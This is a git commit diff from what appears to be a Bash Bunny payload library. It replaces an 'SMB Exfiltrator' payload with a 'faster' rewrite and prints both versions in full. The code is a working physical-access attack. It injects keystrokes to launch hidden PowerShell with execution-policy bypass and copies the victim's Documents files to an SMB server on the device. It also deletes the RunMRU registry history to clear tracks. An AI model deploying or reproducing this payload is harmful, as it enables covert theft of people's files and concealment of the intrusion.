Removed old smb_exfiltrator payload and renamed faster_smb_exfiltrator

Old version is now deprecated. I'll eventually merge the older technique into the existing smb_exfiltrator with execution options.
2025-10-29 16:58:12 +00:00 · 2017-04-07 14:56:51 +10:00 · 2017-04-07 14:56:51 +10:00 · 4346b86ecd
commit 4346b86ecd
parent 147a71fe4f
5 changed files with 87 additions and 233 deletions
--- a/payloads/library/faster_smb_exfiltrator/payload.txt
+++ b/payloads/library/faster_smb_exfiltrator/payload.txt
@ -1,93 +0,0 @@
-#!/bin/bash
-#
-# Title:         Faster SMB Exfiltrator
-# Author:        Hak5Darren
-# Props:         ImNatho, mike111b, madbuda
-# Version:       1.0
-# Category:      Exfiltration
-# Target:        Windows XP SP3+ (Powershell)
-# Attackmodes:   HID, Ethernet
-#
-# Rewrite of the original SMB Exfiltrator payload with:
-# - Faster copying, using robocopy multithreaded mode
-# - Faster finish, using a EXFILTRATION_COMPLETE file
-# - Offload logic to target PC for accurate date/time
-# - Clears tracks by default without second run dialog
-# - Test-Connection handling by ICMP (no lame sleeps)
-# - Hidden powershell window by default
-# 
-# LED Status
-# Red Blinking.........Failed to find dependencies
-# Purple Blinking......HID Stage
-# Purple...............Ethernet Stage
-# Blue/Purple..........Receiving Files
-# White................Moving Liberated Files
-# Green................Finished
-#
-# OPTIONS: configured from s.ps1
-
-
-
-######## INITIALIZATION ########
-# Check for impacket. If not found, blink fast red.
-if [ ! -d /pentest/impacket/ ]; then
-  LED R 100
-  exit 1
-fi
-
-
-
-######## SETUP ########
-# Get switch position from bunny helpers
-source bunny_helpers.sh
-# Make temporary loot directory
-mkdir -p /loot/smb/
-# Delete any old exfiltration data
-rm -rf /loot/smb/*
-# Copy new powershell payload to smb share
-cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
-# Make loot directory on USB Disk
-mkdir -p /root/udisk/loot/smb_exfiltrator
-# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
-echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
-
-
-
-######## HID STAGE ########
-# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
-LED R B 500
-ATTACKMODE HID
-QUACK GUI r
-QUACK DELAY 500
-QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\""
-QUACK ENTER
-
-
-
-######## ETHERNET STAGE ########
-LED R B
-ATTACKMODE RNDIS_ETHERNET
-# Start the SMB Server
-/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log &
-# Re-enable ICMP/echo replies to trip the powershell stager
-echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
-# Wait until files are done copying.
-while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done
-
-
-
-######## CLEANUP ########
-LED R G B
-# Delete EXFILTRATION_COMPLETE file
-rm -rf /loot/smb/EXFILTRATION_COMPLETE
-# Move files to udisk loot directory
-mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
-# Clean up temporary loot directory
-rm -rf /loot/smb/e/*
-# Sync file system
-sync; sleep 1; sync
-
-
-
-######## FINISH ########
-LED G # Trap is clean
--- a/payloads/library/faster_smb_exfiltrator/readme.md
+++ b/payloads/library/faster_smb_exfiltrator/readme.md
@ -1,37 +0,0 @@
-# Faster SMB Exfiltrator
-
-* Author: Hak5Darren
-* Props: ImNatho, mike111b, madbuda
-* Version: Version 1.0
-* Target: Windows XP SP3+ (Powershell)
-* Category: Exfiltration
-* Attackmodes: HID, Ethernet
- 
-## Description
-
-Exfiltrates select files from users's documents folder via SMB.
-Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
-
-Rewrite of the original SMB Exfiltrator payload with:
-* Faster copying, using robocopy multithreaded mode
-* Faster finish, using a EXFILTRATION_COMPLETE file
-* Offload logic to target PC for accurate date/time
-* Clears tracks by default without second run dialog
-* Test-Connection handling by ICMP (no lame sleeps)
-* Hidden powershell window by default
-
-
-## Configuration
-
-Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired. 
-
-## STATUS
-
-| LED                 | Status                                 |
-| ------------------- | -------------------------------------- |
-| Red (blinking)      | Impacket not found in /pentest         |
-| Magenta (blinking)  | HID Stage                              |
-| Magenta             | Ethernet Stage                         |
-| Magenta/Blue        | Receiving files                        |
-| White               | Moving liberated files to mass storage |
-| Green               | Finished                               |
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@ -1,31 +1,34 @@
 #!/bin/bash
 #
-# Title:         SMB Exfiltrator
+# Title:         Faster SMB Exfiltrator
 # Author:        Hak5Darren
+# Props:         ImNatho, mike111b, madbuda
 # Version:       1.0
 # Category:      Exfiltration
 # Target:        Windows XP SP3+ (Powershell)
 # Attackmodes:   HID, Ethernet
+#
+# Rewrite of the original SMB Exfiltrator payload with:
+# - Faster copying, using robocopy multithreaded mode
+# - Faster finish, using a EXFILTRATION_COMPLETE file
+# - Offload logic to target PC for accurate date/time
+# - Clears tracks by default without second run dialog
+# - Test-Connection handling by ICMP (no lame sleeps)
+# - Hidden powershell window by default
 # 
-# 
-# Red Blink Fast.......Impacket not found
-# Red Blink Slow.......Target did not acquire IP address
-# Amber Blink Fast.....Initialization
-# Amber................HID Stage
-# Purple Blink Fast....Ethernet Stage
-# Blue Interstitial....Receiving Files
-# White................Moving loot to mass storage
+# LED Status
+# Red Blinking.........Failed to find dependencies
+# Purple Blinking......HID Stage
+# Purple...............Ethernet Stage
+# Blue/Purple..........Receiving Files
+# White................Moving Liberated Files
 # Green................Finished
 #
-# OPTIONS
-LOOTDIR=/root/udisk/loot/smb_exfiltrator
-EXFILTRATE_FILES="*.pdf"
-CLEARTRACKS="yes" # yes or no
-
-# Initialization
-LED R G 100
+# OPTIONS: configured from s.ps1


+
+######## INITIALIZATION ########
 # Check for impacket. If not found, blink fast red.
 if [ ! -d /pentest/impacket/ ]; then
  LED R 100
@ -33,83 +36,58 @@ if [ ! -d /pentest/impacket/ ]; then
 fi


-# HID STAGE
-# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
-# Once found, initiates file copy and exits
-LED R G
+
+######## SETUP ########
+# Get switch position from bunny helpers
+source bunny_helpers.sh
+# Make temporary loot directory
+mkdir -p /loot/smb/
+# Delete any old exfiltration data
+rm -rf /loot/smb/*
+# Copy new powershell payload to smb share
+cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
+# Make loot directory on USB Disk
+mkdir -p /root/udisk/loot/smb_exfiltrator
+# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
+echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
+
+
+
+######## HID STAGE ########
+# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
+LED R B 500
 ATTACKMODE HID
 QUACK GUI r
 QUACK DELAY 500
-QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\""
 QUACK ENTER

-# Clear tracks?
-if [ $CLEARTRACKS == "yes" ]; then
-   QUACK DELAY 500
-   QUACK GUI r
-   QUACK DELAY 500
-   QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
-   QUACK ENTER
-fi


-# ETHERNET STAGE
-LED R B 100
+######## ETHERNET STAGE ########
+LED R B
 ATTACKMODE RNDIS_ETHERNET
+# Start the SMB Server
+/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log &
+# Re-enable ICMP/echo replies to trip the powershell stager
+echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
+# Wait until files are done copying.
+while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done


-# Setup SMB server to receive loot in staging area
-mkdir -p /root/loot/smb_exfiltrator/temp/
-# house cleaning
-rm -rf /root/loot/smb_exfiltrator/temp/*
-# Fire up SMB Server
-/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &

-
-# Source bunny_helpers.sh to get environment variables
-source bunny_helpers.sh
-
-
-# Give target a chance to start exfiltration
-sleep 2
-
-
-# Make loot directory based on hostname (increment for multiple uses)
-mkdir -p $LOOTDIR
-HOST=${TARGET_HOSTNAME}
-# If hostname is blank set it to "noname"
-[[ -z "$HOST" ]] && HOST="noname"
-COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
-COUNT=$((COUNT+1))
-mkdir -p $LOOTDIR/$HOST-$COUNT
-
-
-# Check target IP address. If unset, blink slow red.
-if [ -z "${TARGET_IP}" ]; then
-    LED R 1000
-	exit 1
-fi
-
-
-# Wait until exfiltration is complete
-last=0
-current=1
-while [ "$last" != "$current" ]; do
-   last=$current
-   current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
-   LED B
-   sleep 1
-   LED R B 100
-   sleep 9
-   # Files are still being copied. Loop. 
-   # (Issue may exist if file takes longer than 10s to copy)
-done
-
-
-# Move files from staging area to loot directory
+######## CLEANUP ########
 LED R G B
-mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
+# Delete EXFILTRATION_COMPLETE file
+rm -rf /loot/smb/EXFILTRATION_COMPLETE
+# Move files to udisk loot directory
+mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
+# Clean up temporary loot directory
+rm -rf /loot/smb/e/*
+# Sync file system
 sync; sleep 1; sync

-# Trap is clean
-LED G
+
+
+######## FINISH ########
+LED G # Trap is clean
--- a/payloads/library/smb_exfiltrator/readme.md
+++ b/payloads/library/smb_exfiltrator/readme.md
@ -1,31 +1,37 @@
-# SMB Exfiltrator
+# Faster SMB Exfiltrator

 * Author: Hak5Darren
+* Props: ImNatho, mike111b, madbuda
 * Version: Version 1.0
 * Target: Windows XP SP3+ (Powershell)
 * Category: Exfiltration
 * Attackmodes: HID, Ethernet
-
+ 
 ## Description

 Exfiltrates select files from users's documents folder via SMB.
-Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
+
+Rewrite of the original SMB Exfiltrator payload with:
+* Faster copying, using robocopy multithreaded mode
+* Faster finish, using a EXFILTRATION_COMPLETE file
+* Offload logic to target PC for accurate date/time
+* Clears tracks by default without second run dialog
+* Test-Connection handling by ICMP (no lame sleeps)
+* Hidden powershell window by default
+

 ## Configuration

-Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. 
+Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired. 

 ## STATUS

 | LED                 | Status                                 |
 | ------------------- | -------------------------------------- |
-| Red (fast blink)    | Impacket not found in /pentest         |
-| Red (slow blink)    | Setup Failed. Target didn't obtain IP  |
-| Purple              | HID Stage                              |
-| Purple (fast blink) | Ethernet Stage                         |
-| Blue (interupt)     | Receiving files                        |
-| White               | Files received, moving to mass storage |
-| Green               | Finished                               |
-
-## Discussion
-[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")
+| Red (blinking)      | Impacket not found in /pentest         |
+| Magenta (blinking)  | HID Stage                              |
+| Magenta             | Ethernet Stage                         |
+| Magenta/Blue        | Receiving files                        |
+| White               | Moving liberated files to mass storage |
+| Green               | Finished                               |
--- a/payloads/library/faster_smb_exfiltrator/s.ps1
+++ b/payloads/library/faster_smb_exfiltrator/s.ps1
@ -1,7 +1,7 @@
-$exfil_dir="$Env:UserProfile\Documents"
-$exfil_ext="*.docx"
-$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
-mkdir $loot_dir
-robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z
-New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+$exfil_dir="$Env:UserProfile\Documents"
+$exfil_ext="*.docx"
+$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
+mkdir $loot_dir
+robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z
+New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue